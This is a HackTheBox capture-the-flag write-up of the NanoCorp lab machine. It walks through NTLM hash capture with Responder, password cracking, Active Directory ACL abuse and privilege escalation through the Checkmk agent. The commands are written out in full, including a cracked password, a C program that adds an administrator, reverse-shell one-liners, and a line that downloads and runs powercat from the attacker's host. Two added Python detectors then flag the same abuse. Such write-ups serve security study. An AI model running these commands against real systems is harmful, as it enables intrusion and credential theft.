AD, Medium, Windows
HTB — NanoCorp
MSSQL enumeration with credential discovery, followed by Active Directory privilege escalation through ACL misconfigurations.
November 8, 2025, HackTheBox
#MSSQL #AD #ACL Abuse
nmap
sh
nmap -sV -sC -p- -Pn 10.129.243.199 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-08 23:50 EST
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.36% done; ETC: 23:54 (0:00:00 remaining)
Nmap scan report for 10.129.243.199
Host is up (0.019s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-09 11:52:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after: 2026-04-06T23:18:43
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
54191/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54196/tcp open msrpc Microsoft Windows RPC
54225/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-09T11:53:39
|_ start_date: N/A
|_clock-skew: 6h59m36s

zip upload
- upload zip to extract hash
- https://github.com/0x6rss/CVE-2025-24071_PoC
sh
responder -I tun0
sh
python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.14.37
completed
sh
responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.37]
Responder IPv6 [dead:beef:2::1023]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-YKE9U8C07QE]
Responder Domain Name [FH4K.LOCAL]
Responder DCE-RPC Port [49565]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.243.199
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:2039376b...
sh
web_svc::NANOCORP:2039376b...
hashcat -m 5600 web_svc.ntlmv2 /usr/share/wordlists/rockyou.txt
WEB_SVC::NANOCORP:2039376b24063147:87319b69...:dksehdgh712!@#
creds
sh
nxc smb 10.129.243.199 -u web_svc -p 'dksehdgh712!@#'
SMB 10.129.243.199 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.243.199 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
bloodhound collector
sh
bloodhound-python -u 'web_svc' -p 'dksehdgh712!@#' -ns 10.129.243.199 -d nanocorp.htb -c all
sh
zip -r nanocorp.zip *.json
AddSelf

- bloodyAD worked to add web_svc to it_support
sh
bloodyAD --host "10.129.243.199" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "it_support" "web_svc"
[+] web_svc added to it_support
sh
net rpc group members "it_support" -U "nanocorp"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
NANOCORP\web_svc
ForceChangePassword
sh
bloodyAD --host "10.129.243.199" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' set password "monitoring_svc" 'dksehdgh712!@#'
[+] Password changed successfully!
- the new password has to be similar to web_svc's to meet the password policy requirements
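A defender-side view of the AddSelf and ForceChangePassword steps above, as an added example that is not part of the original writeup: it correlates Windows Security events 4728/4732/4756 (member added to a security group) with 4724 (password reset attempt) to flag an account that adds itself to a group and then resets a different account's password. The event dictionaries, SIDs, the `helpdesk_adm` and `new_hire` accounts and the 15-minute window are constructed or assumed.

```python
from datetime import datetime, timedelta

# "Member added to security-enabled group": global, domain-local, universal.
GROUP_ADD_IDS = {4728, 4732, 4756}
PASSWORD_RESET_ID = 4724        # password reset attempted on another account
WINDOW = timedelta(minutes=15)  # assumed correlation window; tune per site


def find_self_add_then_reset(events, window=WINDOW):
    """Return findings where one SID adds itself to a group and then resets a
    different account's password within `window`. Events are dicts keyed by
    Windows Security log field names; input order does not matter."""
    self_adds = {}   # subject SID -> [(time, group name)]
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        sid = ev["SubjectUserSid"]
        if ev["EventID"] in GROUP_ADD_IDS and ev["MemberSid"] == sid:
            self_adds.setdefault(sid, []).append(
                (ev["TimeCreated"], ev["TargetUserName"]))
        elif ev["EventID"] == PASSWORD_RESET_ID and ev["TargetSid"] != sid:
            for added_at, group in self_adds.get(sid, []):
                gap = ev["TimeCreated"] - added_at
                if gap <= window:
                    findings.append({
                        "subject": ev["SubjectUserName"],
                        "group": group,
                        "reset_target": ev["TargetUserName"],
                        "gap_seconds": int(gap.total_seconds()),
                    })
    return findings


# Constructed sample events (SIDs, times and the helpdesk accounts are made up).
DOM = "S-1-5-21-1000000001-1000000002-1000000003"
T0 = datetime(2025, 11, 9, 12, 0, 0)
SAMPLE_EVENTS = [
    {"EventID": 4728, "TimeCreated": T0, "SubjectUserName": "web_svc",
     "SubjectUserSid": DOM + "-1104", "MemberSid": DOM + "-1104",
     "TargetUserName": "it_support"},
    {"EventID": 4724, "TimeCreated": T0 + timedelta(minutes=3),
     "SubjectUserName": "web_svc", "SubjectUserSid": DOM + "-1104",
     "TargetUserName": "monitoring_svc", "TargetSid": DOM + "-1105"},
    # Routine helpdesk work: an admin adds someone else, then resets them.
    {"EventID": 4728, "TimeCreated": T0, "SubjectUserName": "helpdesk_adm",
     "SubjectUserSid": DOM + "-1110", "MemberSid": DOM + "-1120",
     "TargetUserName": "it_support"},
    {"EventID": 4724, "TimeCreated": T0 + timedelta(minutes=1),
     "SubjectUserName": "helpdesk_adm", "SubjectUserSid": DOM + "-1110",
     "TargetUserName": "new_hire", "TargetSid": DOM + "-1120"},
]

if __name__ == "__main__":
    for finding in find_self_add_then_reset(SAMPLE_EVENTS):
        print(finding)
```

Comparing `MemberSid` with `SubjectUserSid` rather than names keeps the check valid when an account's CN and sAMAccountName differ.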
sh
sudo ntpdate 10.129.243.199 && nxc smb 10.129.243.199 -u monitoring_svc -p 'dksehdgh712!@#' -k
2025-11-09 21:06:30.824755 (-0500) -0.002329 +/- 0.008283 10.129.243.199 s1 no-leap
SMB 10.129.243.199 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.243.199 445 DC01 [+] nanocorp.htb\monitoring_svc:dksehdgh712!@#
password policy
sh
nxc smb 10.129.1.158 -u web_svc -p 'dksehdgh712!@#' --pass-pol
SMB 10.129.1.158 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.1.158 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB 10.129.1.158 445 DC01 [+] Dumping password info for domain: NANOCORP
SMB 10.129.1.158 445 DC01 Minimum password length: 7
SMB 10.129.1.158 445 DC01 Password history length: 24
SMB 10.129.1.158 445 DC01 Maximum password age: 41 days 23 hours 53 minutes
SMB 10.129.1.158 445 DC01
SMB 10.129.1.158 445 DC01 Password Complexity Flags: 000001
SMB 10.129.1.158 445 DC01 Domain Refuse Password Change: 0
SMB 10.129.1.158 445 DC01 Domain Password Store Cleartext: 0
SMB 10.129.1.158 445 DC01 Domain Password Lockout Admins: 0
SMB 10.129.1.158 445 DC01 Domain Password No Clear Change: 0
SMB 10.129.1.158 445 DC01 Domain Password No Anon Change: 0
SMB 10.129.1.158 445 DC01 Domain Password Complex: 1
SMB 10.129.1.158 445 DC01
SMB 10.129.1.158 445 DC01 Minimum password age: 1 day 4 minutes
SMB 10.129.1.158 445 DC01 Reset Account Lockout Counter: 30 minutes
SMB 10.129.1.158 445 DC01 Locked Account Duration: 30 minutes
SMB 10.129.1.158 445 DC01 Account Lockout Threshold: None
SMB 10.129.1.158 445 DC01 Forced Log off Time: Not Set
sh
ntpdate 10.129.1.158 && impacket-getTGT nanocorp.htb/web_svc:'dksehdgh712!@#'
sh
ntpdate 10.129.243.199 && impacket-getTGT nanocorp.htb/monitoring_svc:'dksehdgh712!@#'
2025-11-09 21:16:34.561987 (-0500) +25199.147576 +/- 0.037085 10.129.243.199 s1 no-leap
CLOCK: time stepped by 25199.147576
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in monitoring_svc.ccache
sh
export KRB5CCNAME=/opt/winrmexec/web_svc.ccache
sh
export KRB5CCNAME=/opt/winrmexec/monitoring_svc.ccache
sh
sudo ntpdate 10.129.243.199 && nxc smb 10.129.243.199 -u monitoring_svc -p 'dksehdgh712!@#' -k
2025-11-09 21:06:30.824755 (-0500) -0.002329 +/- 0.008283 10.129.243.199 s1 no-leap
SMB 10.129.243.199 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.243.199 445 DC01 [+] nanocorp.htb\monitoring_svc:dksehdgh712!@#
sh
export KRB5CCNAME=/home/sake/htb/seasonal/NanoCorp/monitoring_svc.ccache
winrm
sh
ntpdate 10.129.243.199 && python3 evil_winrmexec.py -k -no-pass -ssl dc01.nanocorp.htb
2025-11-11 01:05:15.609736 (-0500) +25200.976278 +/- 0.008074 10.129.243.199 s1 no-leap
CLOCK: time stepped by 25200.976278
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-port' not specified, using 5986
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
inputs from stdin, or exploits that spawn cmd.exe, etc., pop a !revshell
Special !bangs:
!download RPATH [LPATH] # downloads a file or directory (as a zip file); use 'PATH'
# if it contains whitespace
!upload [-xor] LPATH [RPATH] # uploads a file; use 'PATH' if it contains whitespace, though use iwr
# if you can reach your ip from the box, because this can be slow;
# use -xor only in conjunction with !psrun/!netrun
!amsi # amsi bypass, run this right after you get a prompt
!psrun [-xor] URL # run .ps1 script from url; uses ScriptBlock smuggling, so no !amsi patching is
# needed unless that script tries to load a .NET assembly; if you can't reach
# your ip, !upload with -xor first, then !psrun -xor 'c:\foo\bar.ps1' (needs absolute path)
!netrun [-xor] URL [ARG] [ARG] # run .NET assembly from url, use 'ARG' if it contains whitespace;
# !amsi first if you're getting '...program with an incorrect format' errors;
# if you can't reach your ip, !upload with -xor first then !netrun -xor 'c:\foo\bar.exe' (needs absolute path)
!revshell IP PORT # pop a revshell at IP:PORT with stdin/out/err redirected through a socket; if you can't reach your ip and you
# you need to run an executable that expects input, try:
# PS> Set-Content -Encoding ASCII 'stdin.txt' "line1`nline2`nline3"
# PS> Start-Process some.exe -RedirectStandardInput 'stdin.txt' -RedirectStandardOutput 'stdout.txt'
!log # start logging output to winrmexec_[timestamp]_stdout.log
!stoplog # stop logging output to winrmexec_[timestamp]_stdout.log
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
user.txt
sh
PS C:\Users\monitoring_svc\Desktop> cat user.txt
4a4a0138...
privilege escalation
checkmk
- https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/
powershell
PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/5/2025 4:17 PM checkmk
d----- 5/8/2021 1:34 AM Common Files
d----- 11/3/2025 4:13 PM Internet Explorer
d----- 5/8/2021 2:40 AM Microsoft
d----- 5/8/2021 1:34 AM Microsoft.NET
d----- 5/8/2021 2:35 AM Windows Defender
d----- 11/3/2025 4:13 PM Windows Mail
d----- 11/3/2025 4:13 PM Windows Media Player
d----- 5/8/2021 2:35 AM Windows NT
d----- 11/3/2025 4:13 PM Windows Photo Viewer
d----- 5/8/2021 1:34 AM WindowsPowerShell
winpeas
sh
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/winPEASx64.exe -OutFile winPEASx64.exe
runas
sh
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/RunasCs.exe -OutFile RunasCs.exe
powershell
PS C:\Users\monitoring_svc\Documents> .\RunasCs.exe "web_svc" 'dksehdgh712!@#' powershell.exe -r 10.10.14.37:1234
powershell
PS C:\Users\monitoring_svc\Documents> .\RunasCs.exe "monitoring_svc" 'dksehdgh712!@#' powershell.exe -r 10.10.14.37:445
powershell
PS C:\Windows\system32> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Name State PathName
---- ----- --------
ADWS Running C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
BFE Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
BrokerInfrastructure Running C:\Windows\system32\svchost.exe -k DcomLaunch -p
camsvc Running C:\Windows\system32\svchost.exe -k appmodel -p
CDPSvc Running C:\Windows\system32\svchost.exe -k LocalService -p
CertPropSvc Running C:\Windows\system32\svchost.exe -k netsvcs
CheckmkService Running "C:\Program Files (x86)\checkmk\service\check_mk_agent.exe"
- version 2.1
sh
PS C:\programdata> cat cmk_agent_uninstall.txt
cat cmk_agent_uninstall.txt
Checkmk monitoring agent service - 2.1, 64-bit
mal.c
c
#include <stdlib.h>
int main ()
{
    int i;
    i = system ("net localgroup administrators web_svc /add");
    return 0;
}
sh
x86_64-w64-mingw32-gcc mal.c -o mal.exe
powershell
PS C:\users\web_svc\desktop> Invoke-WebRequest http://10.10.14.37/mal.exe -OutFile mal.exe
powershell
1..30000 | foreach { copy C:\users\monitoring_svc\documents\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
10000..30000 | foreach { copy C:\users\web_svc\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\windows\temp> msiexec /fa C:\Windows\Installer\1e6f2.msi
powershell
PS C:\windows\installer> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | Select-Object DisplayName, LocalPackage | Where-Object { $_.DisplayName } | Sort-Object DisplayName
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | Select-Object DisplayName, LocalPackage | Where-Object { $_.DisplayName } | Sort-Object DisplayName
DisplayName LocalPackage
----------- ------------
Check MK Agent 2.1 C:\Windows\Installer\1e6f2.msi
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 C:\Windows\Installer\387ce.msi
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 C:\Windows\Installer\387ca.msi
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 C:\Windows\Installer\387c6.msi
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 C:\Windows\Installer\387c2.msi
VMware Tools
sh
PS C:\windows\temp> ls
ls
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/10/2025 7:06 PM 53 af397ef2....db.ses
-a---- 11/11/2025 3:49 AM 250202 checkmk_repair.log
-a---- 11/11/2025 2:46 AM 115532 cmk_all_3128_0.cmd
sh
PS C:\windows\temp> icacls cmk_all_3128_0.cmd
icacls cmk_all_3128_0.cmd
cmk_all_3128_0.cmd BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NANOCORP\web_svc:(I)(F)
sh
PS C:\windows\temp> copy C:\users\web_svc\desktop\mal.exe cmk_all_3128_0.cmd
powershell
IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.37/powercat.ps1');powercat -c 10.10.14.37 -p 443 -e cmd
powershell
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/root.bat -OutFile root.bat
powershell
PS C:\Users\monitoring_svc\Documents> 1..30000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmkall${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmkall${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\windows\temp> msiexec /fa C:\Windows\Installer\1e6f2.msi
powershell
PS C:\Users\monitoring_svc\Documents> 1..30000 | foreach { copy C:\Users\monitoring_svc\Documents\test.bat C:\Windows\Temp\cmkall${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmkall${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\windows\temp> ls
ls
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/11/2025 4:44 PM 53 af397ef2....db.ses
-a---- 11/11/2025 4:47 PM 1069 cmk_all_2704_1.cmd
-a---- 11/11/2025 4:47 PM 423 cmk_data_2704_2.cmd
-a---- 11/11/2025 4:44 PM 0 mat-debug-5756.log
powershell
1..20000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
1..20000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmk_data_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_data_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\users\web_svc> ls
ls
Directory: C:\users\web_svc
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/5/2025 4:14 PM 3D Objects
d-r--- 4/5/2025 4:14 PM Contacts
d-r--- 4/9/2025 12:51 AM Desktop
d-r--- 4/5/2025 4:14 PM Documents
d-r--- 4/5/2025 4:14 PM Downloads
d-r--- 4/5/2025 4:14 PM Favorites
d-r--- 4/9/2025 12:26 AM Links
d-r--- 4/5/2025 4:14 PM Music
d-r--- 4/5/2025 4:14 PM Pictures
d-r--- 4/5/2025 4:14 PM Saved Games
d-r--- 4/5/2025 4:14 PM Searches
d-r--- 4/5/2025 4:14 PM Videos
-a---- 11/11/2025 4:43 PM 34 root.txt
root.txt
powershell
PS C:\users\web_svc> cat root.txt
cat root.txt
2877f505...
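A defender-side check for the Checkmk agent temp-file pattern in the privilege escalation section above, as an added example that is not part of the original writeup or of Checkmk: it audits a temp directory for `cmk_all_*` / `cmk_data_*` `.cmd` files that are unusually numerous, read-only, or byte-identical. The threshold and the three heuristics are assumptions, and `demo()` runs on constructed files in a throwaway directory.

```python
import hashlib
import re
import stat
import tempfile
from collections import Counter
from pathlib import Path

# Names seen in the listings above: cmk_all_<n>_<n>.cmd and cmk_data_<n>_<n>.cmd
CMK_TEMP = re.compile(r"^cmk_(all|data)_\d+_\d+\.cmd$", re.IGNORECASE)
MAX_EXPECTED = 10  # assumed ceiling for a healthy host; tune per environment


def audit_cmk_temp(temp_dir, max_expected=MAX_EXPECTED):
    """Count Checkmk-style temp scripts in temp_dir and flag signs of pre-staging."""
    total, read_only, digests = 0, 0, Counter()
    for path in Path(temp_dir).iterdir():
        if not (path.is_file() and CMK_TEMP.match(path.name)):
            continue
        total += 1
        # The Windows ReadOnly attribute shows up as a cleared owner-write bit.
        if not path.stat().st_mode & stat.S_IWRITE:
            read_only += 1
        digests[hashlib.sha256(path.read_bytes()).hexdigest()] += 1
    copies = max(digests.values(), default=0)
    reasons = []
    if total > max_expected:
        reasons.append("count")
    if read_only:
        reasons.append("read_only")
    if copies > 1:
        reasons.append("duplicate_content")
    return {"total": total, "read_only": read_only,
            "largest_duplicate_set": copies, "reasons": reasons}


def demo():
    """Audit a constructed directory: 2 ordinary files, then 40 staged copies."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "cmk_all_2704_1.cmd").write_text("@echo section a\n")
        (root / "cmk_data_2704_2.cmd").write_text("@echo section b\n")
        (root / "checkmk_repair.log").write_text("unrelated\n")
        before = audit_cmk_temp(root)
        for n in range(1, 41):
            staged = root / f"cmk_all_{n}_1.cmd"
            staged.write_text("@echo constructed placeholder\n")
            staged.chmod(stat.S_IREAD)
        after = audit_cmk_temp(root)
        for f in root.iterdir():
            f.chmod(stat.S_IREAD | stat.S_IWRITE)  # let cleanup delete them
        return before, after


if __name__ == "__main__":
    print(demo())
```

On a real host, point `audit_cmk_temp` at `C:\Windows\Temp` and treat any non-empty `reasons` list as a prompt to check file ownership with `icacls` and the agent version.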